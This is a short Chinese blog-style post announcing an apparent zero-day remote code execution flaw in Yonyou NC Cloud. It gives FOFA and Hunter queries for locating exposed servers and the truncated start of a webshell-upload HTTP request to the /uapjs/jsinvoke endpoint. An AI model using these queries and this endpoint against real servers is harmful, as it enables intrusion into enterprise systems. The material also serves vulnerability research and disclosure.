0day用友-NC-Cloud远程代码执行漏洞(全版本通杀)

漏洞描述

用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。

 该远程代码执行漏洞可以通过特定接口上传文件,通过上传的webshell执行命令,目前全版本通杀

0day用友-NC-Cloud远程代码执行漏洞(全版本通杀)_第1张图片

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

FOFA:app=“用友-NC-Cloud”
Hunter:web.body=“uap/rbac”

漏洞复现

Poc1 上传木马

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Reque

你可能感兴趣的:(漏洞复现,漏洞复现,渗透测试,网络安全)